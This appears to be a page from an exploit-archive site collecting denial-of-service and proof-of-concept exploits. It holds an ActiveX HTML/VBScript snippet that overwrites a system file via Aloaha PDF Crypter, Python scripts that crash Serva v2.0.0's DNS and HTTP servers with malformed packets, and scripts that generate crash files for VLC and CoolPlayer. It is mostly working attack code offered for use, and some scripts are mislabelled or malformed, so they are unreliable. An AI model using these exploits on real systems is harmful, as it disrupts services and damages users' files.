Archive for Dos/Poc

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite dos exploit

============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
 
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This activex contains the "SaveToFile" which could be used to overwite arbitrary files on
pc users.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability

#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed QueryName causes the crash
# Howto:         -
 
import socket
 
target="192.168.0.1"
port=53
 
TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00" #vulnerable: first length-byte
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC +  AuthRRC + AddRRC + QueryName + QueryType + QueryClass
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) #udp
 
print "[*] Sending malformed request..."
 
s.sendto(payload,(target,port))
 
print "[!] Exploit has been sent!\n"
s.close()

Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability

Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability

#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed GET Request causes the crash
# Howto:         -
 
import socket
 
target="192.168.0.21"
port=80
 
# 0000   47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d  GET  / HTTP/1.1.
# 0010   0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39  .Host: http://19
# 0020   32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74  2.168.0.21..Cont
# 0030   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d  ent-Length: 0...
# 0040   0a                                               .
 
payload = (
"\x47\x45\x54\x20\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #tcp
try:
connect=s.connect((target, port))
print "[*] Connected to " + target + "!"
except:
print "[!] " + target + " didn't respond\n"
sys.exit(0)
 
print "[*] Sending malformed request..."
 
s.send(payload)
 
print "[!] Exploit has been sent!\n"
s.close()

Lecteur multimedia VLC 2.0.3 Twoflower (.ape) Crash Poc

Lecteur multimedia VLC 2.0.3 Twoflower (.ape) Crash Poc exploit

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
 
# Title : Lecteur multimédia VLC 2.0.3 Twoflower (.ape) Crash Poc
# Date: 2012-01-09
# Software Link: http://www.videolan.org/vlc/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
 
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";                 
print "    |=======================================================|\n";
print "    |= [!] Name : VLC 2.0.3  || .APE File                  =|\n";
print "    |= [!] Exploit : Crash  Exploit                        =|\n";
print "    |= [!] Author  : The Black Devils                      =|\n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print "    |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Dz.ape"); 
print file $PoC; 
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

CoolPlayerPlusPortable 2.19.4 (m3u) crash poc

CoolPlayerPlusPortable 2.19.4 (m3u) crash poc exploit

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
 
# Title : CoolPlayerPlusPortable 2.19.4 (m3u) crash poc 
# Date: 2013-01-10
# Software http://coolplayer.sourceforge.net/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / All DZ Hackerz
 
#!/usr/bin/perl
 
file="Dz.m3u"
crash="\x41" * 100
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write(crash)
writeFile.close()
print "[*] File successfully created!"
except:
print "[*] Error while creating file!"
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------